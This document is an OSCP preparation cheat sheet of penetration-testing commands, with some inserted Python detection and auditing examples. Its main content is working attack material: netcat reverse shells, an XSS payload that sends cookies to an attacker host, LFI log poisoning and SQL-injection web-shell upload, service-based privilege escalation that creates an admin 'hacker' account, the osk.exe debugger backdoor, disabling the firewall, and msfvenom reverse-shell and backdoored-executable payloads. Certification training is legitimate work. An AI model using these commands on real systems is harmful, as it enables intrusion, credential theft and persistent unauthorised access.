I want to share a couple of things that I think helped me prepare for the Offensive Security Certified Professional (OSCP) certification, together with what I found useful during the labs and the exam. If you have any questions, feel free to contact me.
Don't forget to:
- Follow the courseware first, and only then start practicing in the labs.
- Use additional sources to learn more.
- Join the Offensive Security PWK forums and social media, and talk to other people.
Tips
Enable a service on every reboot: update-rc.d <[SERVICE]> enable
Extract the link hosts belonging to one domain from an HTML page (deduplicated):
  cat index.html | grep "href=" | cut -d "/" -f3 | grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u
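The grep/cut pipeline above breaks on single-quoted attributes or a different attribute order. As an added example (not from the original cheat sheet), the same job done with Python's standard HTML parser: collect every href, keep the hosts under one domain, and return them sorted and de-duplicated. The sample page is constructed and uses the reserved example.com domain.

```python
# Added example (not part of the original cheat sheet): extract the hosts that
# links on an HTML page point to, restricted to one domain. Equivalent to the
# grep/cut/sort -u pipeline, but with a real HTML parser so quoting style and
# attribute order do not matter.
from html.parser import HTMLParser
from urllib.parse import urlparse


class HrefCollector(HTMLParser):
    """Collect every href attribute value from <a> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_hosts(html, domain):
    """Return the sorted, de-duplicated hosts of links that are `domain`
    itself or a subdomain of it. Relative links have no host and are skipped."""
    parser = HrefCollector()
    parser.feed(html)
    hosts = set()
    for href in parser.hrefs:
        host = urlparse(href).hostname
        if host and (host == domain or host.endswith("." + domain)):
            hosts.add(host)
    return sorted(hosts)


# Constructed sample page; example.com is a reserved documentation domain.
SAMPLE_HTML = """
<html><body>
<a href="http://www.example.com/index.html">home</a>
<a href='https://mail.example.com/login'>mail</a>
<a href="http://www.example.com/about">about</a>
<a href="http://notexample.com/">unrelated</a>
<a href="/relative/path">relative</a>
</body></html>
"""

if __name__ == "__main__":
    for host in extract_hosts(SAMPLE_HTML, "example.com"):
        print(host)
```

Note that the suffix check uses "." + domain, so notexample.com is not mistaken for a host of example.com, a false positive the plain grep in the pipeline would produce.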
Netcat
Interact with an application: nc -nv <[IP]> <[PORT]>
Listener: nc -nlvp <[PORT]>
File transfer (client, receives): nc -nlvp <[PORT]> > <[FILE]>
File transfer (server, sends): nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]>
Bind vs Reverse Shell
Bind Shell:
Bob needs Alice's help. Bob sets up a listener on port 4444 with the -e parameter, and Alice connects to it:
  (BOB): nc -nlvp <[PORT]> -e cmd.exe
  (ALICE): nc -nv <[BOB_IP]> <[PORT]>
Reverse Shell:
Alice needs Bob's help. Since Alice is behind a firewall, Bob cannot reach Alice, so Alice creates a reverse shell out to Bob's listener:
  (ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash
  (BOB): nc -nlvp <[PORT]>
Zone Transfer
dnsrecon -t axfr -d <[DOMAIN]>
Nmap
nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]>
SMB
nbtscan <[SUBNET]>
nmap -p139,445 --script smb-enum-users <[SUBNET]>
nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
enum4linux <[IP]>
smbclient -L <[IP]> -N
smbclient \\<[IP]>\share -N
SMTP
nmap -p25 <[SUBNET]> --open
nc -nv <[IP]> 25
VRFY <[USERNAME]>
SNMP
Steps: nmap scan of UDP 161, create a target IP list, create a community-string list file, then use onesixtyone and snmpwalk:
  nmap -sU --open -p161 <[SUBNET]>
  onesixtyone -c community -i <[SNMP_IP_LIST]>
  snmpwalk -c public -v1 <[IP]> <mib-values>
MIB values (for snmpwalk):
  1.3.6.1.2.1.25.1.6.0    System Processes
  1.3.6.1.2.1.25.4.2.1.2  Running Programs
  1.3.6.1.2.1.25.4.2.1.4  Processes Path
  1.3.6.1.2.1.25.2.3.1.4  Storage Units
  1.3.6.1.2.1.25.6.3.1.2  Software Name
  1.3.6.1.4.1.77.1.2.25   User
  1.3.6.1.2.1.6.13.1.3    TCP Local Ports
File Transfer Linux
Netcat:
  On victim machine (client, receives): nc -nlvp 4444 > <[FILE]>
  On attacker machine (server, sends): nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
Curl: curl -O http://<[IP]>/<[FILE]>
Wget: wget http://<[IP]>/<[FILE]>
Recursive wget FTP download: wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]>
File Transfer Windows
TFTP (installed by default up to Windows XP and 2003; in Windows 7, 2008 and above it must be added explicitly, so TFTP is not the ideal file transfer protocol in most situations):
  On attacker machine:
    mkdir tftp
    atftpd --daemon --port 69 tftp
    cp <[FILE]> tftp
  On victim machine shell:
    tftp -i <[IP]> GET <[FILE]>
FTP (Windows operating systems include a default FTP client that can also be used for file transfer):
  On attacker machine:
    (one-time) Install an FTP server: apt-get install pure-ftpd
    (one-time) Create a new user for PureFTPD (see script setup-ftp.sh; USER demo, PASS demo1234):
      groupadd ftpgroup
      useradd -g ftpgroup -d /dev/null -s /etc ftpuser
      pure-pw useradd demo -u ftpuser -d /ftphome
      pure-pw mkdb
      cd /etc/pure-ftpd/auth
      ln -s ../conf/PureDB 60pdb
      mkdir -p /ftphome
      chown -R ftpuser:ftpgroup /ftphome
      /etc/init.d/pure-ftpd restart
    (one-time) chmod 755 setup-ftp.sh
  On victim machine shell (the script logs in as demo with the password set above):
    echo open <[IP]> 21 > ftp.txt
    echo USER demo >> ftp.txt
    echo demo1234 >> ftp.txt
    echo bin >> ftp.txt
    echo GET nc.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -v -n -s:ftp.txt
VBScript (in Windows XP, 2003):
  On victim machine shell (each echo appends one line to wget.vbs; they can also be joined with & on a single cmd line):
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET", strURL, False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs
    cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
Powershell (in Windows 7, 2008 and above):
  On victim machine shell:
    echo $storageDir = $pwd > wget.ps1
    echo $webclient = New-Object System.Net.WebClient >> wget.ps1
    echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1
    echo $file = "evil.exe" >> wget.ps1
    echo $webclient.DownloadFile($url,$file) >> wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Debug.exe utility (in Windows 32-bit OS; works only for files < 64 KB):
  On attacker machine:
    cp <[FILE]> .
    upx -9 <[FILE]>   (for compression)
    cp /usr/share/windows-binaries/exe2bat.exe .
    wine exe2bat <[FILE]> <[FILE.txt]>
  On victim machine: paste the content of <[FILE.txt]>
XSS
Steal a cookie through XSS: on the attacker machine set up a listener (nc -nlvp <[PORT]>), then on the victim website inject:
  <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script>
LFI/RFI
Connect via netcat to the victim (nc -nv <[IP]> <[PORT]>) and send <?php echo shell_exec($_GET['cmd']);?>, so that the line ends up in the web server's access log; then try to include the log file for code execution:
  &cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log
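Both the XSS cookie theft and the LFI log poisoning above leave recognisable traces in web server logs. As an added example (not from the original cheat sheet), detection logic for the two, run over constructed Apache combined-format log lines: requests whose query string carries a session cookie, a raw PHP tag landing in the log as a malformed request, and ../ traversal in the request target. IP addresses, hostnames and timestamps in the sample are placeholders.

```python
# Added example, not part of the original cheat sheet: detection logic for the
# two web-log patterns this page touches, run over constructed Apache
# "combined" log lines. It flags (1) requests whose query string carries a
# session cookie, the footprint the cookie-stealing <script> leaves on the
# collector or on any proxy in the path, and (2) log poisoning: a raw PHP tag
# written into the access log, and requests using ../ traversal to include it.
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache combined log: ip ident user [time] "request" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "ASP.NET_SessionId")
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e(%2f|%5c))", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse.
    A malformed request (no "METHOD target HTTP/x" triple, as when a raw string
    is sent with netcat) keeps the whole request field as the target."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        rec["method"], rec["target"] = parts[0], parts[1]
    else:
        rec["method"], rec["target"] = None, rec["request"]
    return rec


def find_cookie_exfil(lines):
    """(ip, parameter) for requests whose query string carries a session cookie."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, values in parse_qs(urlparse(rec["target"]).query).items():
            if any(name + "=" in v for v in values for name in SESSION_COOKIE_NAMES):
                hits.append((rec["ip"], param))
    return hits


def find_log_poisoning(lines):
    """(ip, reason) for PHP tags written into the log and traversal in the target."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if "<?php" in unquote(rec["target"]) or "<?php" in rec["agent"]:
            hits.append((rec["ip"], "php-tag"))
        if TRAVERSAL_RE.search(rec["target"]):
            hits.append((rec["ip"], "traversal"))
    return hits


# Constructed sample lines (addresses, hostnames and times are placeholders).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /test.php?output=PHPSESSID=abc123def HTTP/1.1" '
    '404 0 "http://www.example.com/" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "<?php echo shell_exec($_GET[\'cmd\']);?>" 400 226 "-" "-"',
    '10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] '
    '"GET /index.php?LANG=../../../../../../../xampp/apache/logs/access.log HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_cookie_exfil(SAMPLE_LOG))
    print(find_log_poisoning(SAMPLE_LOG))
```

The malformed-request case matters: the raw PHP tag sent with netcat never forms a valid request line, so a parser that insists on "METHOD target HTTP/x" would drop exactly the line that shows the poisoning. Checking the User-Agent field covers the other common place a PHP tag is planted.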
SQL Injection
Base: any' or 1=1 limit 1;--
Number of columns: order by 1, order by 2, ... (increase until the query errors)
Expose data from the database: UNION select 1,2,3,4,5,6
Enumerate tables: UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload: <[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
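Why the base payload and the "order by" probe above work, and what stops them, as an added example (not from the original cheat sheet): a login query built by string formatting next to the same query with bound parameters, against a constructed in-memory SQLite database. The table and users are constructed; only the payload shape comes from the page.

```python
# Added example, not from the original cheat sheet: the "any' or 1=1" bypass
# against a query built by string formatting, next to the parameterised query
# that neutralises it, and the ORDER BY column-count probe the page lists,
# shown against an in-memory SQLite database so it runs anywhere.
import sqlite3


def make_db():
    """Constructed sample database. Plain-text passwords are for the demo only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "battery staple")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement with string formatting: user input becomes SQL."""
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Bound parameters: the driver sends the values separately from the SQL
    text, so quotes and comment markers in the input are just data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def probe_columns(conn, max_cols=20):
    """How the 'order by 1, order by 2, ...' trick works: ORDER BY n succeeds
    while n is within the column count of the SELECT and errors beyond it.
    Returns the column count the vulnerable query exposes (1 here)."""
    for n in range(1, max_cols + 1):
        try:
            login_vulnerable(conn, "x' ORDER BY %d--" % n, "")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


if __name__ == "__main__":
    db = make_db()
    payload = "any' or 1=1 limit 1--"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # ['alice']
    print("safe:      ", login_safe(db, payload, "wrong"))        # []
    print("columns:   ", probe_columns(db))                       # 1
```

With the formatted query the WHERE clause becomes `username = 'any' or 1=1 limit 1--' AND password = 'wrong'`, the comment swallows the password check and the first user is returned. The parameterised version compares the literal string and finds nobody.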
Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <[ADDRESS]>
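What the two scripts above actually compute, as an added example (not from the original cheat sheet and not Metasploit's code): the cyclic "Aa0Aa1Aa2..." pattern, in which every 4-byte window is unique for the first 20280 bytes, and the reverse lookup that turns the value found in EIP (read as a little-endian 32-bit integer) back into an offset into the pattern.

```python
# Added example, not from the original cheat sheet: a Python reimplementation
# of the cyclic pattern behind pattern_create.rb / pattern_offset.rb. The
# pattern is every upper/lower/digit triple in order, so any 4-byte window is
# unique within the first 26*26*10*3 = 20280 bytes.
import string


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern."""
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds the 20280-byte unique pattern")


def pattern_offset(value, length=20280):
    """Offset of `value` inside the pattern, or -1 if absent.
    `value` is either a 4-character string or an integer as read from a
    32-bit register on a little-endian machine (0x41336141 -> "Aa3A")."""
    pattern = pattern_create(length)
    if isinstance(value, int):
        try:
            needle = value.to_bytes(4, "little").decode("ascii")
        except (OverflowError, UnicodeDecodeError):
            return -1
    else:
        needle = value
    return pattern.find(needle)


if __name__ == "__main__":
    print(pattern_create(20))          # Aa0Aa1Aa2Aa3Aa4Aa5Aa
    print(pattern_offset("Aa3A"))      # 9
    print(pattern_offset(0x41336141))  # 9
```

The integer form mirrors the usual workflow: the debugger shows EIP = 41336141, and the byte order reversal is what makes that correspond to "Aa3A" at offset 9 rather than "A3aA".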
Privilege Escalation
Vulnerable services:
  accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  sc qc <[VULNERABLE_SERVICE]>
  sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
  sc config <[VULNERABLE_SERVICE]> start= "auto"
  sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
  sc stop <[VULNERABLE_SERVICE]>
  sc start <[VULNERABLE_SERVICE]>
  sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrators hacker /add"
  sc stop <[VULNERABLE_SERVICE]>
  sc start <[VULNERABLE_SERVICE]>
  sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
  sc stop <[VULNERABLE_SERVICE]>
  sc start <[VULNERABLE_SERVICE]>
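The accesschk command above is also the audit a defender runs to find services whose ACL lets ordinary users reconfigure them. As an added example (not from the original cheat sheet), a parser for its output that extracts those services so their permissions can be fixed; the sample text is constructed in the layout accesschk -v prints, and "vulnsvc" is a placeholder name.

```python
# Added example, not from the original cheat sheet: an audit-side parser for
# the output of `accesschk.exe -uwcqv "Authenticated Users" *`. It pulls out
# the services whose rights let that group change the service configuration
# (the condition the sc config commands rely on) so the ACLs can be corrected.
# The sample output is constructed in accesschk's layout; names are placeholders.
DANGEROUS_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
}


def parse_accesschk(text):
    """Return {service: {"access": "RW"/"R"/"W", "rights": [...]}}.
    A service line starts in column 0 with the access summary; its specific
    rights follow on indented lines. Banner text in column 0 is ignored."""
    services = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            parts = line.split(None, 1)
            if len(parts) == 2 and set(parts[0]) <= set("RW"):
                current = parts[1].strip()
                services[current] = {"access": parts[0], "rights": []}
            else:
                current = None  # banner or error text, not a service
        elif current is not None:
            services[current]["rights"].append(line.strip())
    return services


def writable_services(text):
    """Sorted names of services whose rights allow reconfiguring the service."""
    return sorted(
        name
        for name, info in parse_accesschk(text).items()
        if DANGEROUS_RIGHTS & set(info["rights"])
    )


# Constructed sample in the shape accesschk prints (banner, then services).
SAMPLE_OUTPUT = """\
Accesschk (constructed sample banner line)
Copyright line of the constructed sample

RW vulnsvc
        SERVICE_ALL_ACCESS
R  Spooler
        SERVICE_QUERY_CONFIG
        SERVICE_QUERY_STATUS
RW upnphost
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
"""

if __name__ == "__main__":
    for name in writable_services(SAMPLE_OUTPUT):
        print("service reconfigurable by Authenticated Users:", name)
```

A service that only grants SERVICE_START or SERVICE_STOP is not flagged: restarting a service is harmless on its own, while SERVICE_CHANGE_CONFIG is what lets the binary path or the account be replaced.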
Win10:
  reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
  Then press Ctrl+Alt+Del and start the On-Screen Keyboard.
Pass the hash
export SMBHASH=<[HASH]>
pth-winexe -U administrator% //<[IP]> cmd
Cracking
Medusa: medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC): ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
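Medusa and ncrack runs like the ones above are loud: a burst of failed logins from one source, often followed by a success once the list hits. As an added example (not from the original cheat sheet), detection over constructed sshd auth.log lines using a sliding window of failures per source IP; hostnames, PIDs and addresses are placeholders, and the year is assumed because syslog timestamps do not carry one.

```python
# Added example, not from the original cheat sheet: detection for the password
# guessing medusa/ncrack produce, run over constructed sshd auth.log lines.
# It counts failed logins per source inside a sliding window and also reports
# a source that succeeds right after a burst of failures, the signature of a
# guessed password.
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port")
TS_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) ")


def parse_auth_line(line, year=2023):
    """Return (timestamp, event, user, ip) or None. syslog stamps lack a year,
    so one is assumed (constructed sample uses 2023)."""
    m = TS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    f = FAILED_RE.search(line)
    if f:
        return ts, "failed", f.group("user"), f.group("ip")
    a = ACCEPTED_RE.search(line)
    if a:
        return ts, "accepted", a.group("user"), a.group("ip")
    return None


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: [alert strings]} for sources with `threshold` or more
    failures inside `window_seconds`, and for a success following such a burst."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still in the window
    alerted = set()
    alerts = defaultdict(list)
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        ts, kind, user, ip = ev
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if kind == "failed":
            q.append(ts)
            if len(q) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts[ip].append("%d failures within %ds" % (len(q), window_seconds))
        elif kind == "accepted" and len(q) >= threshold:
            alerts[ip].append("success for %s after %d recent failures" % (user, len(q)))
    return dict(alerts)


# Constructed sample lines; 10.0.0.9 guesses, 10.0.0.5 is a user mistyping once.
SAMPLE_AUTH = [
    "Oct 10 13:55:30 host sshd[1201]: Failed password for invalid user admin from 10.0.0.9 port 40001 ssh2",
    "Oct 10 13:55:31 host sshd[1202]: Failed password for invalid user test from 10.0.0.9 port 40002 ssh2",
    "Oct 10 13:55:32 host sshd[1203]: Failed password for root from 10.0.0.9 port 40003 ssh2",
    "Oct 10 13:55:33 host sshd[1204]: Failed password for root from 10.0.0.9 port 40004 ssh2",
    "Oct 10 13:55:34 host sshd[1205]: Failed password for alice from 10.0.0.9 port 40005 ssh2",
    "Oct 10 13:55:35 host sshd[1206]: Accepted password for alice from 10.0.0.9 port 40006 ssh2",
    "Oct 10 13:57:00 host sshd[1207]: Failed password for bob from 10.0.0.5 port 50001 ssh2",
    "Oct 10 13:57:05 host sshd[1208]: Accepted password for bob from 10.0.0.5 port 50002 ssh2",
]

if __name__ == "__main__":
    for ip, found in detect_bruteforce(SAMPLE_AUTH).items():
        for msg in found:
            print(ip, msg)
```

The sliding window is what separates a guessing run from a forgetful user: a single failure followed by a success is normal, five failures in five seconds and then a success is not.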
Firewall
Enable Remote Desktop:
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  netsh firewall set service remotedesktop enable
Enable Remote Assistance:
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
  netsh firewall set service remoteadmin enable
Disable firewall: netsh firewall set opmode disable
One shot ninja combo (new admin user, firewall off + RDP):
  set CMD "net user hacker Hacker123 /add & net localgroup administrators hacker /add & net localgroup \"Remote Desktop Users\" hacker /add & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"
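The registry changes in this section and in the Win10 privilege escalation entry (the IFEO Debugger on osk.exe, fDenyTSConnections set to 0, fAllowToGetHelp set to 1) are easy to check for in a registry export. As an added example (not from the original cheat sheet), a checker over a constructed regedit-style export covering both passages; the export is plain text here, whereas a real .reg export is UTF-16 with a BOM and must be decoded first.

```python
# Added example, not from the original cheat sheet: a checker for the registry
# changes this page makes, the IFEO "Debugger" hijack of osk.exe and the
# Terminal Server values that turn on RDP and Remote Assistance, run over a
# constructed regedit-style export. Each finding is (key, value name, detail).
import re

SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')
IFEO_MARKER = "\\Image File Execution Options\\"
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_reg_export(text):
    """Return {key: {name: data}} for a .reg file; dword values become ints,
    quoted strings lose their quotes, anything else is kept as raw text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group("key")
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            data = m.group("data")
            if data.startswith("dword:"):
                keys[current][m.group("name")] = int(data[6:], 16)
            elif data.startswith('"') and data.endswith('"'):
                keys[current][m.group("name")] = data[1:-1]
            else:
                keys[current][m.group("name")] = data
    return keys


def find_suspicious(keys):
    """Flag IFEO Debugger entries and Terminal Server values that open RDP /
    Remote Assistance. Key comparison is case-insensitive, as the registry is."""
    findings = []
    for key, values in keys.items():
        if IFEO_MARKER.lower() in key.lower() and "Debugger" in values:
            image = key.rsplit("\\", 1)[-1]
            findings.append((key, "Debugger",
                             "IFEO debugger set for %s: %s" % (image, values["Debugger"])))
        if key.lower() == TS_KEY.lower():
            if values.get("fDenyTSConnections") == 0:
                findings.append((key, "fDenyTSConnections", "Remote Desktop connections enabled"))
            if values.get("fAllowToGetHelp") == 1:
                findings.append((key, "fAllowToGetHelp", "Remote Assistance enabled"))
    return findings


# Constructed sample export; the third key is benign filler.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
"Debugger"="cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"fAllowToGetHelp"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Example]
"Harmless"="yes"
"""

if __name__ == "__main__":
    for key, name, detail in find_suspicious(parse_reg_export(SAMPLE_REG)):
        print("%s [%s]: %s" % (detail, name, key))
```

Any Debugger value under Image File Execution Options is reported, not just osk.exe: the accessibility binary is the target in this cheat sheet, but the hijack works the same for any image name, so a defender wants the whole key tree watched.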
Backdooring EXE Files
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>
Binaries payloads
Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
Web payloads
PHP:
  msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
  cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
WAR: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>
Scripting Payloads
Python: msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
Bash: msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
Perl: msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
Shellcode
For all shellcode see 'msfvenom --help-formats' for the valid output formats. Msfvenom will output code that can be cut and pasted into your exploit in the chosen language.
Linux based shellcode: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Windows based shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Mac based shellcode: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Staged vs Non-Staged Payloads
Staged payload (useful for BOF; needs a Metasploit multi/handler in order to work), e.g. windows/shell/reverse_tcp:
  msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non-staged payload (works with a plain netcat listener), e.g. windows/shell_reverse_tcp:
  msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
Handlers
Metasploit handlers are a quick way to get Metasploit ready to receive your incoming shells. Handlers should be set up in the following format:
  use exploit/multi/handler
  set PAYLOAD <[PAYLOAD_NAME]>
